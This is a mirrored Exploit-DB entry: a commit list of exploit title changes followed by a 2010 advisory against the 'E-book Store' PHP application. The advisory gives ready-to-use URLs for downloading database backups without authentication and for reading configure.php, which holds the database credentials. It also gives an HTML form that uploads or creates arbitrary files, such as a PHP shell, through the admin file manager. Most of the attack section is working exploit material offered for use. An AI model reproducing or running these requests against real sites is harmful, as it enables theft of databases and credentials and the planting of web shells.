exploit-db-mirror/platforms/php/webapps/12857.txt
Offensive Security 6d17bc529d DB: 2017-03-31
4 new exploits

dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow (PoC)
dBpowerAMP Audio Player 2 - '.m3u' Buffer Overflow (PoC)

Spider Solitaire -  Denial of Service (PoC)
Spider Solitaire - Denial of Service (PoC)

Baby FTP Server 1.24 - Denial of Service
Baby FTP Server 1.24 - Denial of Service (1)

Baby FTP server 1.24 - Denial of Service
Baby FTP server 1.24 - Denial of Service (2)

Google Android -  Unprotected MSRs in EL1 RKP Privilege Escalation
Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation

Evostream Media Server 1.7.1  (x64) - Denial of Service
Evostream Media Server 1.7.1 (x64) - Denial of Service

Cerberus FTP Server  8.0.10.1 - Denial of Service
Cerberus FTP Server 8.0.10.1 - Denial of Service

Apple macOS/IOS 10.12.2(16C67) - mach_msg Heap Overflow

Apache < 2.0.64  / < 2.2.21 mod_setenvif - Integer Overflow
Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow

Solaris 10 sysinfo() - Local Kernel Memory Disclosure
Solaris 10 sysinfo() - Local Kernel Memory Disclosure (1)

Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure
Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2)

Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit)
Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (1)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) -  (Sendmail) Capabilities Privilege Escalation(1)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) -  (Sendmail 8.10.1) Capabilities Privilege Escalation (2)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2)

Linux Kernel 3.13 -  (SGID) Privilege Escalation (PoC)
Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC)

Linux espfix64 -  (Nested NMIs Interrupting) Privilege Escalation
Linux espfix64 - (Nested NMIs Interrupting) Privilege Escalation
Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)
Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)
Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) (2)
Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) (1)
Forticlient 5.2.3 Windows 10 x64 (Pre Anniversary) - Privilege Escalation
Forticlient 5.2.3 Windows 10 x64 (Post Anniversary) - Privilege Escalation
Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Privilege Escalation
Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Privilege Escalation

Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via UserNamespace Privilege Escalation
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation

Ubuntu 15.04 (Dev) - 'Upstart' Logrotation Privilege Escalation
Ubuntu 15.04 (Development) - 'Upstart' Logrotation Privilege Escalation

Linux Kernel 2.6.32 (Ubuntu 10.04) - /proc Handling SUID Privilege Escalation

Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)

Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2)

Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow (1)
Yahoo! Music Jukebox 2.2 - 'AddImage()' ActiveX Remote Buffer Overflow (1)

dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow
dBpowerAMP Audio Player 2 - '.m3u' Buffer Overflow

Apache Tomcat < 6.0.18 - utf8 Directory Traversal (1)
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)

Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (1)
Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray (1)

Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray
Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray (2)

EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow
EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (1)

Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2)
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal

Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit)
Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (2)

Samba 2.2.2 < 2.2.6 - nttrans Buffer Overflow (Metasploit)
Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (2)

EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow
EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (2)

Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)

Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)

D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (2)
D-Link Devices - 'command.php' Unauthenticated Remote Command Execution (Metasploit)

D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (1)
D-Link Devices - 'tools_vct.xgi' Unauthenticated Remote Command Execution (Metasploit)

Azure Data Expert Ultimate  2.2.16 - Buffer Overflow
Azure Data Expert Ultimate 2.2.16 - Buffer Overflow

Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit)
Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1)

Article Script 1.6.3 - 'rss.php' SQL Injection (1)
Article Script 1.6.3 - 'rss.php' SQL Injection

DBHcms 1.1.4 - Remote File Inclusion
DBHcms 1.1.4 - 'code' Remote File Inclusion

LaserNet CMS 1.5 - SQL Injection (2)
LaserNet CMS 1.5 - SQL Injection

Clever Copy 3.0 - 'postview.php' SQL Injection (1)
Clever Copy 3.0 - 'postview.php' SQL Injection

phpAuction - 'profile.php' SQL Injection
phpAuction - 'profile.php' SQL Injection (1)

Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection
Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection (1)

Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection
Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection (2)

Matterdaddy Market 1.1 - Multiple SQL Injections (1)
Matterdaddy Market 1.1 - 'index.php' Multiple SQL Injections

PHPWebGallery 1.3.4 - Blind SQL Injection
PHPWebGallery 1.3.4 - Blind SQL Injection (1)

PHPWebGallery 1.3.4 - Blind SQL Injection
PHPWebGallery 1.3.4 - Blind SQL Injection (2)

Zeeways Shaadi Clone 2.0 - Authentication Bypass
Zeeways Shaadi Clone 2.0 - Authentication Bypass (1)

Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities
Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (1)

DBHcms 1.1.4 - Remote File Inclusion
DBHcms 1.1.4 - 'dbhcms_core_dir' Remote File Inclusion

E-book Store - Multiple Vulnerabilities (1)

Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (1)

E-book Store - Multiple Vulnerabilities (2)
E-book Store - Multiple Vulnerabilities

Classifieds Script - SQL Injection
Classifieds Script - 'rate' SQL Injection

Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (2)

DBHcms 1.1.4 - SQL Injection
DBHcms 1.1.4 - 'dbhcms_pid' SQL Injection

LaserNet CMS 1.5 - SQL Injection (1)

Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection
Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection (2)

Article Script 1.6.3 - 'rss.php' SQL Injection (2)

Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection
Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection (1)

Openads (PHPAdsNew) <  2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion
Openads (PHPAdsNew) < 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion

LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting
LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting (1)

LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting
LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting (2)
Fonality trixbox 2.4.2 - Cross-Site Scripting
Fonality trixbox 2.4.2 - Cross-Site Scripting (1)
Fonality trixbox 2.4.2 - Cross-Site Scripting (2)

Clever Copy 3.0 - 'postview.php' SQL Injection (2)

phpAuction - 'profile.php' SQL Injection
phpAuction - 'profile.php' SQL Injection (2)

Zeeways Shaadi Clone 2.0 - Authentication Bypass
Zeeways Shaadi Clone 2.0 - Authentication Bypass (2)

DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Inclusion

Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities
Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (2)

Matterdaddy Market 1.1 - Multiple SQL Injections (2)
Matterdaddy Market 1.1 - 'cat_name' Multiple SQL Injections

WordPress Plugin WP Private Messages 1.0.1 - SQL Injection
WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (1)

Huawei Flybox B660 - Cross-Site Request Forgery
Huawei Flybox B660 - Cross-Site Request Forgery (1)

Huawei Flybox B660 - Cross-Site Request Forgery
Huawei Flybox B660 - Cross-Site Request Forgery (2)

Classifieds Script - SQL Injection
Classifieds Script - 'term' SQL Injection

WordPress Plugin WP Private Messages 1.0.1 - SQL Injection
WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (2)
2017-03-31 05:01:16 +00:00

105 lines
4.7 KiB
Text
Executable file
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

========================================================================================
| # Title : E-book Store Mullti Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.iqs3cur1ty.com
| # Web Site : http://dl.p30vel.ir/
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : Mullti
====================== Exploit By indoushka =================================
# Exploit :
1- Backup Dump
http://localhost/ebookstore/admin/backups/ (2 Find Backup File)
2- If you don't find a buckup stor thisis how to Creat And Download Backup fil SQl
http://127.0.0.1/ebookstore/admin/backup.php/login.php?action=backup
http://127.0.0.1/ebookstore/admin/backup.php/login.php?action=backupnow
to download buckup :http://127.0.0.1/ebookstore/admin/backup.php/login.php?action=download&file=db_ebookstore-20100301222138.sql
db_ebookstore-20100301222138.sql chang it to the name of the backup and download it with opera 10.10 + Mozilla Firefox Or IDM
==================================================================
# E-book Store (File Disclosure) Vulnerabilities
=======================================================================
########################################################################
# Vendor: http://dl.p30vel.ir/
# Date: 2010-05-27
# Author : indoushka
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact : indoushka@hotmail.com
# Home : www.arab-blackhat.co.cc
# Dork : n/0
# Bug : File Disclosure
# Tested on : windows SP2 Français V.(Pnx2 2.0)
########################################################################
# Exploit By indoushka
# File Disclosure :
in : admin/file_manager.php/login.php?action=download&filename=
Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
=======================================================================
# E-book Store (Remote File Upload) Vulnerabilities
=======================================================================
########################################################################
# Vendor: http://dl.p30vel.ir/
# Date: 2010-05-27
# Author : indoushka
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact : indoushka@hotmail.com
# Home : www.arab-blackhat.co.cc
# Dork : n/0
# Bug : Remote File Upload
# Tested on : windows SP2 Français V.(Pnx2 2.0)
########################################################################
# Exploit By indoushka
<html><head><title> osCSS 1.2.1 - Remote File Upload </title></head>
<br><br><u>UPLOAD FILE:</u><br>
<form name="file" action="http://<-- CHANGE HERE -->/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data">
<input type="file" name="file_1"><br>
<input name="submit" type="submit" value=" Upload " >
</form>
<br><u>CREATE FILE:</u><br>
<form name="new_file" action="http://<-- CHANGE HERE -->/admin/file_manager.php/login.php?action=save" method="post">
FILE NAME:<br>
<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
<input name="submit" type="submit" value=" Save " >
</form>
</html>
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------